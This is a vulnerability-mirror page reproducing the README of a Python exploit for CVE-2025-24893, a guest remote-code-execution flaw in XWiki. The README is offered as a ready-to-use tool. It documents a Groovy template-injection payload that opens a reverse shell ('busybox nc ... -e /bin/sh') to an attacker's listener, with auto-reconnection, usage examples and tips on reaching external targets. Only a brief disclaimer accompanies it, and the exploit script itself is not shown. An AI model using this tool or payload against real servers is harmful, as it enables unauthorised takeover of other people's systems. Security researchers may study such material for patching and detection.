漏洞平台

POC详情： 4bc4f9df59accdc479e9c7fceb303aeaad7b5344

来源

https://github.com/nopgadget/CVE-2025-24893

关联漏洞

标题： XWiki Platform 安全漏洞 (CVE-2025-24893)
描述：XWiki Platform是XWiki开源的一套用于创建Web协作应用程序的Wiki平台。 XWiki Platform存在安全漏洞，该漏洞源于任何来宾用户都可以通过对SolrSearch的请求，造成远程代码执行。

介绍

# CVE-2025-24893 - XWiki Platform Remote Code Execution

A Python exploit for CVE-2025-24893, a remote code execution vulnerability in XWiki Platform. This exploit includes a self-contained reverse shell listener using pwntools.

## Description

This exploit targets XWiki Platform installations vulnerable to CVE-2025-24893, allowing remote code execution through a template injection vulnerability in the SolrSearch component. The exploit automatically starts a reverse shell listener and provides an interactive shell upon successful exploitation.

## Requirements

- Python 3.x
- `requests` library
- `pwntools` library

## Installation

### Recommended: Using UV (Modern Python Package Manager)

```bash
# Install UV if you don't have it
curl -LsSf https://astral.sh/uv/install.sh | sh

# Install dependencies
uv pip install requests pwntools
```

### Alternative: Using pip

```bash
pip install requests pwntools
```

## Usage

### Basic Usage

```bash
python3 CVE-2025-24893.py <target_url>
```

### Examples

```bash
# Basic usage with default callback (0.0.0.0:9521)
python3 CVE-2025-24893.py example.com

# Custom callback IP and port
python3 CVE-2025-24893.py example.com -i 192.168.1.100 -p 4444

# Skip initial test and go straight to reverse shell
python3 CVE-2025-24893.py example.com --no-test

# Custom reconnection attempts
python3 CVE-2025-24893.py example.com --max-reconnects 10

# Full custom configuration
python3 CVE-2025-24893.py example.com -i 10.0.0.5 -p 8080 --no-test --max-reconnects 3
```

### Command Line Arguments

- `target`: Target URL (required)
  - Can be domain only: `example.com`
  - Can include protocol: `http://example.com` or `https://example.com`

- `-i, --ip`: Callback IP for reverse shell (default: 0.0.0.0)
  - Use `0.0.0.0` to listen on all interfaces
  - Use specific IP (e.g., `192.168.1.100`) to bind to specific interface

- `-p, --port`: Callback port for reverse shell (default: 9521)

- `--no-test`: Skip the initial test and go straight to reverse shell

- `--max-reconnects`: Maximum reconnection attempts when shell drops (default: 5)

## How It Works

1. **Protocol Detection**: Automatically detects if the target supports HTTP or HTTPS
2. **Test Phase**: Runs a test command (`id`) to verify the exploit works
3. **Listener Setup**: Automatically starts a reverse shell listener using pwntools
4. **Payload Execution**: Sends the reverse shell payload to the target
5. **Interactive Shell**: Provides an interactive shell upon successful connection
6. **Auto-Reconnection**: Automatically re-establishes connection if shell drops

## Self-Contained Reverse Shell

This exploit is self-contained and does not require manual netcat setup:

- Automatically starts a listener on the specified IP and port
- Handles the reverse shell connection automatically
- Provides an interactive shell interface
- No need to manually run `nc -lvp <port>`

## Automatic Reconnection

The exploit includes robust reconnection capabilities:

- **EOF Handling**: Automatically detects when shell connection drops
- **Auto-Recovery**: Re-establishes listener and re-sends exploit payload
- **Configurable Retries**: Set maximum reconnection attempts (default: 5)
- **Graceful Degradation**: Continues until max attempts reached

### Reconnection Behavior

When the shell connection drops (EOF error):
1. Detects the connection loss
2. Closes the old listener
3. Starts a new listener
4. Re-sends the exploit payload
5. Re-establishes the shell connection
6. Continues interactive session

## Payload Details

The exploit uses a Groovy template injection payload that executes:
```bash
busybox nc <callback_ip> <callback_port> -e /bin/sh
```

## Features

- **Automatic Protocol Detection**: Detects HTTP/HTTPS automatically
- **Self-Contained Listener**: No manual netcat setup required
- **Interactive Shell**: Full interactive shell upon successful exploitation
- **Test Mode**: Optional test phase to verify exploit works
- **Flexible Configuration**: Customizable callback IP and port
- **Auto-Reconnection**: Handles connection drops automatically
- **Robust Error Handling**: Graceful handling of various error conditions

## Troubleshooting

### Common Issues

1. **"Address already in use"**: Change the port using `-p` flag
2. **"Permission denied"**: Try using a port > 1024 or run with sudo
3. **No connection received**: 
   - Verify the target is vulnerable
   - Check if the target can reach your callback IP
   - Ensure no firewall is blocking the connection
4. **"Got EOF while sending in interactive"**: 
   - The script will automatically handle this and re-establish connection
   - If persistent, check network stability or increase `--max-reconnects`

### Network Considerations

- The callback IP should be reachable from the target
- Use `0.0.0.0` to listen on all interfaces
- For external targets, ensure your IP is publicly accessible
- Unstable networks may require higher reconnection limits

## Disclaimer

This tool is for educational and authorized testing purposes only. Always ensure you have proper authorization before testing any systems.

## Credits

- **Author**: nopgadget
- **Based on**: Original script by Al Baradi Joy

## License

This project is for educational purposes only. Use responsibly and only on systems you own or have explicit permission to test.

文件快照


 [4.0K]  /data/pocs/4bc4f9df59accdc479e9c7fceb303aeaad7b5344
├── [9.0K]  CVE-2025-24893.py
└── [5.2K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。